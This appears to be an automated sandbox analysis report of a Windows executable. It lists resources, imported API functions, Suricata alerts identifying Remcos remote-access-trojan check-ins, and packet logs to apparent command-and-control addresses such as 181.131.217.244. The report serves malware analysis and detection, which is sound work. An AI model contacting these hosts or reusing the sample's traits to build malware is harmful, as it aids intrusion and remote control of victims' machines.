                                                                                                                                            RT_STRING0x18649c0x328dataDanishDenmark0.34405940594059403
                                                                                                                                            RT_STRING0x1867c40x328dataGermanGermany0.34405940594059403
                                                                                                                                            RT_STRING0x186aec0x328dataGreekGreece0.34405940594059403
                                                                                                                                            RT_STRING0x186e140x328dataFinnishFinland0.34405940594059403
                                                                                                                                            RT_STRING0x18713c0x328dataFrenchFrance0.34405940594059403
                                                                                                                                            RT_STRING0x1874640x328dataHebrewIsrael0.34405940594059403
                                                                                                                                            RT_STRING0x18778c0x328dataHungarianHungary0.34405940594059403
                                                                                                                                            RT_STRING0x187ab40x328dataItalianItaly0.34405940594059403
                                                                                                                                            RT_STRING0x187ddc0x328dataJapaneseJapan0.34405940594059403
                                                                                                                                            RT_STRING0x1881040x328dataKoreanNorth Korea0.34405940594059403
                                                                                                                                            RT_STRING0x1881040x328dataKoreanSouth Korea0.34405940594059403
                                                                                                                                            RT_STRING0x18842c0x328dataDutchNetherlands0.34405940594059403
                                                                                                                                            RT_STRING0x1887540x328dataNorwegianNorway0.34405940594059403
                                                                                                                                            RT_STRING0x188a7c0x328dataPolishPoland0.34405940594059403
                                                                                                                                            RT_STRING0x188da40x328dataPortugueseBrazil0.34405940594059403
                                                                                                                                            RT_STRING0x1890cc0x328dataRussianRussia0.34405940594059403
                                                                                                                                            RT_STRING0x1893f40x328dataSwedishSweden0.34405940594059403
                                                                                                                                            RT_STRING0x18971c0x328dataThaiThailand0.34405940594059403
                                                                                                                                            RT_STRING0x189a440x328dataChineseChina0.34405940594059403
                                                                                                                                            RT_STRING0x189d6c0x328dataPortuguesePortugal0.34405940594059403
                                                                                                                                            RT_STRING0x18a0940x328data0.34405940594059403
                                                                                                                                            RT_STRING0x18a3bc0x328dataEnglishCanada0.34405940594059403
                                                                                                                                            RT_STRING0x18a6e40x70dataChineseTaiwan0.625
                                                                                                                                            RT_STRING0x18a7540x70dataCzechCzech Republic0.625
                                                                                                                                            RT_STRING0x18a7c40x70dataDanishDenmark0.625
                                                                                                                                            RT_STRING0x18a8340x70dataGermanGermany0.625
                                                                                                                                            RT_STRING0x18a8a40x70dataGreekGreece0.625
                                                                                                                                            RT_STRING0x18a9140x70dataFinnishFinland0.625
                                                                                                                                            RT_STRING0x18a9840x70dataFrenchFrance0.625
                                                                                                                                            RT_STRING0x18a9f40x70dataHebrewIsrael0.625
                                                                                                                                            RT_STRING0x18aa640x70dataHungarianHungary0.625
                                                                                                                                            RT_STRING0x18aad40x70dataItalianItaly0.625
                                                                                                                                            RT_STRING0x18ab440x70dataJapaneseJapan0.625
                                                                                                                                            RT_STRING0x18abb40x70dataKoreanNorth Korea0.625
                                                                                                                                            RT_STRING0x18abb40x70dataKoreanSouth Korea0.625
                                                                                                                                            RT_STRING0x18ac240x70dataDutchNetherlands0.625
                                                                                                                                            RT_STRING0x18ac940x70dataNorwegianNorway0.625
                                                                                                                                            RT_STRING0x18ad040x70dataPolishPoland0.625
                                                                                                                                            RT_STRING0x18ad740x70dataPortugueseBrazil0.625
                                                                                                                                            RT_STRING0x18ade40x70dataRussianRussia0.625
                                                                                                                                            RT_STRING0x18ae540x70dataSwedishSweden0.625
                                                                                                                                            RT_STRING0x18aec40x70dataThaiThailand0.625
                                                                                                                                            RT_STRING0x18af340x70dataChineseChina0.625
                                                                                                                                            RT_STRING0x18afa40x70dataPortuguesePortugal0.625
                                                                                                                                            RT_STRING0x18b0140x70data0.625
                                                                                                                                            RT_STRING0x18b0840x70dataEnglishCanada0.625
                                                                                                                                            RT_STRING0x18b0f40x106dataChineseTaiwan0.5763358778625954
                                                                                                                                            RT_STRING0x18b1fc0x106dataCzechCzech Republic0.5763358778625954
                                                                                                                                            RT_STRING0x18b3040x106dataDanishDenmark0.5763358778625954
                                                                                                                                            RT_STRING0x18b40c0x106dataGermanGermany0.5763358778625954
                                                                                                                                            RT_STRING0x18b5140x106dataGreekGreece0.5763358778625954
                                                                                                                                            RT_STRING0x18b61c0x106dataFinnishFinland0.5763358778625954
                                                                                                                                            RT_STRING0x18b7240x106dataFrenchFrance0.5763358778625954
                                                                                                                                            RT_STRING0x18b82c0x106dataHebrewIsrael0.5763358778625954
                                                                                                                                            RT_STRING0x18b9340x106dataHungarianHungary0.5763358778625954
                                                                                                                                            RT_STRING0x18ba3c0x106dataItalianItaly0.5763358778625954
                                                                                                                                            RT_STRING0x18bb440x106dataJapaneseJapan0.5763358778625954
                                                                                                                                            RT_STRING0x18bc4c0x106dataKoreanNorth Korea0.5763358778625954
                                                                                                                                            RT_STRING0x18bc4c0x106dataKoreanSouth Korea0.5763358778625954
                                                                                                                                            RT_STRING0x18bd540x106dataDutchNetherlands0.5763358778625954
                                                                                                                                            RT_STRING0x18be5c0x106dataNorwegianNorway0.5763358778625954
                                                                                                                                            RT_STRING0x18bf640x106dataPolishPoland0.5763358778625954
                                                                                                                                            RT_STRING0x18c06c0x106dataPortugueseBrazil0.5763358778625954
                                                                                                                                            RT_STRING0x18c1740x106dataRussianRussia0.5763358778625954
                                                                                                                                            RT_STRING0x18c27c0x106dataSwedishSweden0.5763358778625954
                                                                                                                                            RT_STRING0x18c3840x106dataThaiThailand0.5763358778625954
                                                                                                                                            RT_STRING0x18c48c0x106dataChineseChina0.5763358778625954
                                                                                                                                            RT_STRING0x18c5940x106dataPortuguesePortugal0.5763358778625954
                                                                                                                                            RT_STRING0x18c69c0x106data0.5763358778625954
                                                                                                                                            RT_STRING0x18c7a40x106dataEnglishCanada0.5763358778625954
                                                                                                                                            RT_STRING0x18c8ac0xdadataChineseTaiwan0.43119266055045874
                                                                                                                                            RT_STRING0x18c9880xdadataCzechCzech Republic0.43119266055045874
                                                                                                                                            RT_STRING0x18ca640xdadataDanishDenmark0.43119266055045874
                                                                                                                                            RT_STRING0x18cb400xdadataGermanGermany0.43119266055045874
                                                                                                                                            RT_STRING0x18cc1c0xdadataGreekGreece0.43119266055045874
                                                                                                                                            RT_STRING0x18ccf80xdadataFinnishFinland0.43119266055045874
                                                                                                                                            RT_STRING0x18cdd40xdadataFrenchFrance0.43119266055045874
                                                                                                                                            RT_STRING0x18ceb00xdadataHebrewIsrael0.43119266055045874
                                                                                                                                            RT_STRING0x18cf8c0xdadataHungarianHungary0.43119266055045874
                                                                                                                                            RT_STRING0x18d0680xdadataItalianItaly0.43119266055045874
                                                                                                                                            RT_STRING0x18d1440xdadataJapaneseJapan0.43119266055045874
                                                                                                                                            RT_STRING0x18d2200xdadataKoreanNorth Korea0.43119266055045874
                                                                                                                                            RT_STRING0x18d2200xdadataKoreanSouth Korea0.43119266055045874
                                                                                                                                            RT_STRING0x18d2fc0xdadataDutchNetherlands0.43119266055045874
                                                                                                                                            RT_STRING0x18d3d80xdadataNorwegianNorway0.43119266055045874
                                                                                                                                            RT_STRING0x18d4b40xdadataPolishPoland0.43119266055045874
                                                                                                                                            RT_STRING0x18d5900xdadataPortugueseBrazil0.43119266055045874
                                                                                                                                            RT_STRING0x18d66c0xdadataRussianRussia0.43119266055045874
                                                                                                                                            RT_STRING0x18d7480xdadataSwedishSweden0.43119266055045874
                                                                                                                                            RT_STRING0x18d8240xdadataThaiThailand0.43119266055045874
                                                                                                                                            RT_STRING0x18d9000xdadataChineseChina0.43119266055045874
                                                                                                                                            RT_STRING0x18d9dc0xdadataPortuguesePortugal0.43119266055045874
                                                                                                                                            RT_STRING0x18dab80xdadata0.43119266055045874
                                                                                                                                            RT_STRING0x18db940xdadataEnglishCanada0.43119266055045874
                                                                                                                                            RT_STRING0x18dc700x46dataChineseTaiwan0.7428571428571429
                                                                                                                                            RT_STRING0x18dcb80x46dataCzechCzech Republic0.7428571428571429
                                                                                                                                            RT_STRING0x18dd000x46dataDanishDenmark0.7428571428571429
                                                                                                                                            RT_STRING0x18dd480x46dataGermanGermany0.7428571428571429
                                                                                                                                            RT_STRING0x18dd900x46dataGreekGreece0.7428571428571429
                                                                                                                                            RT_STRING0x18ddd80x46dataFinnishFinland0.7428571428571429
                                                                                                                                            RT_STRING0x18de200x46dataFrenchFrance0.7428571428571429
                                                                                                                                            RT_STRING0x18de680x46dataHebrewIsrael0.7428571428571429
                                                                                                                                            RT_STRING0x18deb00x46dataHungarianHungary0.7428571428571429
                                                                                                                                            RT_STRING0x18def80x46dataItalianItaly0.7428571428571429
                                                                                                                                            RT_STRING0x18df400x46dataJapaneseJapan0.7428571428571429
                                                                                                                                            RT_STRING0x18df880x46dataKoreanNorth Korea0.7428571428571429
                                                                                                                                            RT_STRING0x18df880x46dataKoreanSouth Korea0.7428571428571429
                                                                                                                                            RT_STRING0x18dfd00x46dataDutchNetherlands0.7428571428571429
                                                                                                                                            RT_STRING0x18e0180x46dataNorwegianNorway0.7428571428571429
                                                                                                                                            RT_STRING0x18e0600x46dataPolishPoland0.7428571428571429
                                                                                                                                            RT_STRING0x18e0a80x46dataPortugueseBrazil0.7428571428571429
                                                                                                                                            RT_STRING0x18e0f00x46dataRussianRussia0.7428571428571429
                                                                                                                                            RT_STRING0x18e1380x46dataSwedishSweden0.7428571428571429
                                                                                                                                            RT_STRING0x18e1800x46dataThaiThailand0.7428571428571429
                                                                                                                                            RT_STRING0x18e1c80x46dataChineseChina0.7428571428571429
                                                                                                                                            RT_STRING0x18e2100x46dataPortuguesePortugal0.7428571428571429
                                                                                                                                            RT_STRING0x18e2580x46data0.7428571428571429
                                                                                                                                            RT_STRING0x18e2a00x46dataEnglishCanada0.7428571428571429
                                                                                                                                            RT_STRING0x18e2e80x1f8dataChineseTaiwan0.36706349206349204
                                                                                                                                            RT_STRING0x18e4e00x1f8dataCzechCzech Republic0.36706349206349204
                                                                                                                                            RT_STRING0x18e6d80x1f8dataDanishDenmark0.36706349206349204
                                                                                                                                            RT_STRING0x18e8d00x1f8dataGermanGermany0.36706349206349204
                                                                                                                                            RT_STRING0x18eac80x1f8dataGreekGreece0.36706349206349204
                                                                                                                                            RT_STRING0x18ecc00x1f8dataFinnishFinland0.36706349206349204
                                                                                                                                            RT_STRING0x18eeb80x1f8dataFrenchFrance0.36706349206349204
                                                                                                                                            RT_STRING0x18f0b00x1f8dataHebrewIsrael0.36706349206349204
                                                                                                                                            RT_STRING0x18f2a80x1f8dataHungarianHungary0.36706349206349204
                                                                                                                                            RT_STRING0x18f4a00x1f8dataItalianItaly0.36706349206349204
                                                                                                                                            RT_STRING0x18f6980x1f8dataJapaneseJapan0.36706349206349204
                                                                                                                                            RT_STRING0x18f8900x1f8dataKoreanNorth Korea0.36706349206349204
                                                                                                                                            RT_STRING0x18f8900x1f8dataKoreanSouth Korea0.36706349206349204
                                                                                                                                            RT_STRING0x18fa880x1f8dataDutchNetherlands0.36706349206349204
                                                                                                                                            RT_STRING0x18fc800x1f8dataNorwegianNorway0.36706349206349204
                                                                                                                                            RT_STRING0x18fe780x1f8dataPolishPoland0.36706349206349204
                                                                                                                                            RT_STRING0x1900700x1f8dataPortugueseBrazil0.36706349206349204
                                                                                                                                            RT_STRING0x1902680x1f8dataRussianRussia0.36706349206349204
                                                                                                                                            RT_STRING0x1904600x1f8dataSwedishSweden0.36706349206349204
                                                                                                                                            RT_STRING0x1906580x1f8dataThaiThailand0.36706349206349204
                                                                                                                                            RT_STRING0x1908500x1f8dataChineseChina0.36706349206349204
                                                                                                                                            RT_STRING0x190a480x1f8dataPortuguesePortugal0.36706349206349204
                                                                                                                                            RT_STRING0x190c400x1f8data0.36706349206349204
                                                                                                                                            RT_STRING0x190e380x1f8dataEnglishCanada0.36706349206349204
                                                                                                                                            RT_STRING0x1910300x86dataChineseTaiwan0.6567164179104478
                                                                                                                                            RT_STRING0x1910b80x86dataCzechCzech Republic0.6567164179104478
                                                                                                                                            RT_STRING0x1911400x86dataDanishDenmark0.6567164179104478
                                                                                                                                            RT_STRING0x1911c80x86dataGermanGermany0.6567164179104478
                                                                                                                                            RT_STRING0x1912500x86dataGreekGreece0.6567164179104478
                                                                                                                                            RT_STRING0x1912d80x86dataFinnishFinland0.6567164179104478
                                                                                                                                            RT_STRING0x1913600x86dataFrenchFrance0.6567164179104478
                                                                                                                                            RT_STRING0x1913e80x86dataHebrewIsrael0.6567164179104478
                                                                                                                                            RT_STRING0x1914700x86dataHungarianHungary0.6567164179104478
                                                                                                                                            RT_STRING0x1914f80x86dataItalianItaly0.6567164179104478
                                                                                                                                            RT_STRING0x1915800x86dataJapaneseJapan0.6567164179104478
                                                                                                                                            RT_STRING0x1916080x86dataKoreanNorth Korea0.6567164179104478
                                                                                                                                            RT_STRING0x1916080x86dataKoreanSouth Korea0.6567164179104478
                                                                                                                                            RT_STRING0x1916900x86dataDutchNetherlands0.6567164179104478
                                                                                                                                            RT_STRING0x1917180x86dataNorwegianNorway0.6567164179104478
                                                                                                                                            RT_STRING0x1917a00x86dataPolishPoland0.6567164179104478
                                                                                                                                            RT_STRING0x1918280x86dataPortugueseBrazil0.6567164179104478
                                                                                                                                            RT_STRING0x1918b00x86dataRussianRussia0.6567164179104478
                                                                                                                                            RT_STRING0x1919380x86dataSwedishSweden0.6567164179104478
                                                                                                                                            RT_STRING0x1919c00x86dataThaiThailand0.6567164179104478
                                                                                                                                            RT_STRING0x191a480x86dataChineseChina0.6567164179104478
                                                                                                                                            RT_STRING0x191ad00x86dataPortuguesePortugal0.6567164179104478
                                                                                                                                            RT_STRING0x191b580x86data0.6567164179104478
                                                                                                                                            RT_STRING0x191be00x86dataEnglishCanada0.6567164179104478
                                                                                                                                            RT_STRING0x191c680x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                            RT_STRING0x191cec0x2adataEnglishUnited States0.5476190476190477
                                                                                                                                            RT_STRING0x191d180x192dataEnglishUnited States0.48009950248756217
                                                                                                                                            RT_STRING0x191eac0x4e2dataEnglishUnited States0.376
                                                                                                                                            RT_STRING0x1923900x31adataEnglishUnited States0.2682619647355164
                                                                                                                                            RT_STRING0x1926ac0x2dcdataEnglishUnited States0.36885245901639346
                                                                                                                                            RT_STRING0x1929880x8adataEnglishUnited States0.6594202898550725
                                                                                                                                            RT_STRING0x192a140xacdataEnglishUnited States0.45348837209302323
                                                                                                                                            RT_STRING0x192ac00xdedataEnglishUnited States0.536036036036036
                                                                                                                                            RT_STRING0x192ba00x4c4dataEnglishUnited States0.3221311475409836
                                                                                                                                            RT_STRING0x1930640x264dataEnglishUnited States0.3741830065359477
                                                                                                                                            RT_STRING0x1932c80x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                            RT_STRING0x1932f40x42dataEnglishUnited States0.6060606060606061
                                                                                                                                            RT_ACCELERATOR0x1933380x50dataEnglishUnited States0.8
                                                                                                                                            RT_RCDATA0x1933880x9c27aDelphi compiled form 'TdmMain'0.3199121339566298
                                                                                                                                            RT_RCDATA0x22f6040x23e27Delphi compiled form 'TfLogin'0.2975582210187573
                                                                                                                                            RT_MESSAGETABLE0x25342c0x2840data0.4204192546583851
                                                                                                                                            RT_MESSAGETABLE0x255c6c0x2840data0.3144409937888199
                                                                                                                                            RT_GROUP_CURSOR0x2584ac0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                            RT_GROUP_CURSOR0x2584d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2584e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2584f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x25850c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x25855c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_CURSOR0x2585d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                            RT_GROUP_ICON0x2585e80x22dataEnglishUnited States1.0
                                                                                                                                            RT_VERSION0x25860c0x32cdataEnglishUnited States0.4248768472906404
                                                                                                                                            RT_ANIICON0x2589380x4e4a0PC bitmap, Windows 3.x format, 40938 x 2 x 38, image size 320770, cbSize 320672, bits offset 540.9413013920766391

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            KERNEL32.dllVirtualQuery, RtlUnwind, ExitProcess, TerminateProcess, GetStartupInfoA, GetCommandLineA, GetSystemTimeAsFileTime, SetEnvironmentVariableA, ExitThread, CreateThread, HeapReAlloc, SetStdHandle, GetFileType, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemInfo, GetStringTypeW, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetTimeZoneInformation, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, LCMapStringA, LCMapStringW, SetUnhandledExceptionFilter, IsBadReadPtr, IsBadCodePtr, GetLocaleInfoW, VirtualAlloc, VirtualProtect, HeapFree, HeapAlloc, FileTimeToSystemTime, GetOEMCP, GetCPInfo, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, InterlockedIncrement, WritePrivateProfileStringA, GlobalFlags, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GetFullPathNameA, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedDecrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, WaitForSingleObject, ResumeThread, GlobalAddAtomA, MulDiv, lstrcpynA, GetCurrentThreadId, GlobalAlloc, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, GlobalLock, GlobalUnlock, GlobalFree, FreeResource, GetThreadLocale, GetLocaleInfoA, GetACP, CreateFileA, GetFileTime, DosDateTimeToFileTime, LocalFileTimeToFileTime, SetFileTime, FileTimeToLocalFileTime, SetErrorMode, CreateDirectoryA, RemoveDirectoryA, CreateProcessA, GetExitCodeProcess, GetSystemDirectoryA, GetWindowsDirectoryA, GetTempPathA, LocalAlloc, GetCurrentProcess, GetVersionExA, GetCurrentThread, SetThreadPriority, GetLogicalDrives, GetDriveTypeA, GetShortPathNameA, FormatMessageA, LocalFree, GetDiskFreeSpaceA, SetLastError, GetVolumeInformationA, GetUserDefaultLangID, DeleteFileA, CopyFileA, SetFileAttributesA, GetFileAttributesA, FindFirstFileA, FindNextFileA, FindClose, FindResourceExA, CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, SetCurrentDirectoryA, GetModuleHandleA, GetCurrentDirectoryA, LoadLibraryA, GetProcAddress, FreeLibrary, Sleep, FindResourceA, LoadResource, LockResource, SizeofResource, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeA, InterlockedExchange
                                                                                                                                            USER32.dllGetMenuItemInfoA, InflateRect, GetSysColorBrush, LoadMenuA, DestroyMenu, UnpackDDElParam, ReuseDDElParam, ReleaseCapture, LoadAcceleratorsA, InvalidateRect, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, SetMenu, TranslateAcceleratorA, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, TrackPopupMenu, SetForegroundWindow, UpdateWindow, GetClientRect, GetMenu, GetSysColor, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, UnregisterClassA, CallWindowProcA, OffsetRect, IntersectRect, IsIconic, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, GetWindowTextA, SetWindowPos, SetFocus, ShowWindow, SetWindowLongA, GetDlgCtrlID, SetWindowTextA, IsDialogMessageA, SendDlgItemMessageA, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, IsWindowVisible, GetKeyState, GetCursorPos, ValidateRect, GetLastActivePopup, ShowOwnedPopups, SetCursor, GetMenuState, GetMenuItemID, GetMenuItemCount, GetSubMenu, PostMessageA, PostQuitMessage, GetDesktopWindow, GetActiveWindow, SetActiveWindow, GetSystemMetrics, CreateDialogIndirectParamA, AdjustWindowRectEx, DestroyWindow, IsWindow, GetWindowLongA, GetDlgItem, IsWindowEnabled, GetParent, GetNextDlgTabItem, SendMessageA, EndDialog, PeekMessageA, TranslateMessage, DispatchMessageA, wsprintfA, ExitWindowsEx, SystemParametersInfoA, DefWindowProcA, LoadImageA, MessageBoxA, LoadCursorA, EnableWindow, CharUpperA
                                                                                                                                            GDI32.dllTextOutA, RectVisible, PtVisible, BitBlt, DeleteObject, CreateFontIndirectA, GetTextExtentPoint32A, CreateCompatibleBitmap, CreateSolidBrush, GetStockObject, CreateCompatibleDC, CreatePatternBrush, DeleteDC, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, GetPixel, GetDeviceCaps, SetMapMode, SetBkMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, ExtTextOutA
                                                                                                                                            comdlg32.dllGetFileTitleA
                                                                                                                                            WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter
                                                                                                                                            ADVAPI32.dllRegEnumKeyExA, LookupPrivilegeValueA, OpenProcessToken, FreeSid, RevertToSelf, AccessCheck, IsValidSecurityDescriptor, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, AddAccessAllowedAce, RegQueryValueA, RegEnumKeyA, RegOpenKeyA, RegCreateKeyExA, RegSetValueExA, AdjustTokenPrivileges, RegDeleteKeyA, RegQueryValueExA, RegCloseKey, RegOpenKeyExA, ImpersonateSelf, OpenThreadToken, AllocateAndInitializeSid, InitializeSecurityDescriptor, GetLengthSid, InitializeAcl
                                                                                                                                            SHELL32.dllDragFinish, DragQueryFileA, ShellExecuteA
                                                                                                                                            COMCTL32.dllImageList_Draw, ImageList_GetImageInfo, ImageList_Destroy
                                                                                                                                            SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                                                                                            ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                                                                                                            OLEAUT32.dllVariantClear, VariantInit, VariantChangeType
                                                                                                                                            VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishUnited States
                                                                                                                                            ChineseTaiwan
                                                                                                                                            CzechCzech Republic
                                                                                                                                            DanishDenmark
                                                                                                                                            GermanGermany
                                                                                                                                            GreekGreece
                                                                                                                                            FinnishFinland
                                                                                                                                            FrenchFrance
                                                                                                                                            HebrewIsrael
                                                                                                                                            HungarianHungary
                                                                                                                                            ItalianItaly
                                                                                                                                            JapaneseJapan
                                                                                                                                            KoreanNorth Korea
                                                                                                                                            KoreanSouth Korea
                                                                                                                                            DutchNetherlands
                                                                                                                                            NorwegianNorway
                                                                                                                                            PolishPoland
                                                                                                                                            PortugueseBrazil
                                                                                                                                            RussianRussia
                                                                                                                                            SwedishSweden
                                                                                                                                            ThaiThailand
                                                                                                                                            ChineseChina
                                                                                                                                            PortuguesePortugal
                                                                                                                                            EnglishCanada

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-12-12T17:42:16.545424+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.549831181.131.217.2441842TCP
                                                                                                                                            2024-12-12T17:42:17.820688+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1181.131.217.2441842192.168.2.549831TCP
                                                                                                                                            2024-12-12T17:42:19.877289+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549836178.237.33.5080TCP
                                                                                                                                            2024-12-12T17:44:20.335417+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1181.131.217.2441842192.168.2.549831TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 12, 2024 17:41:35.858514071 CET4972930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:35.981908083 CET3020349729181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:35.981980085 CET4972930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:36.018373966 CET4972930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:36.138252974 CET3020349729181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:36.138330936 CET4972930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:36.261948109 CET3020349729181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:37.354285955 CET3020349729181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:37.397896051 CET4972930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:37.587166071 CET3020349729181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:37.605170965 CET4972930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:37.735383034 CET3020349729181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:37.735455990 CET4972930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:37.905442953 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:37.905500889 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:37.905566931 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:38.009970903 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:38.010011911 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:39.815087080 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:39.815179110 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:39.818748951 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:39.818777084 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:39.819030046 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:39.866446972 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:39.919423103 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:39.963340998 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:40.502317905 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:40.502346039 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:40.502382994 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:40.502407074 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:40.502423048 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:40.502430916 CET44349736185.166.143.48192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:40.502468109 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:40.533760071 CET49736443192.168.2.5185.166.143.48
                                                                                                                                            Dec 12, 2024 17:41:40.809202909 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:40.809340954 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:40.809459925 CET49743443192.168.2.554.231.203.105
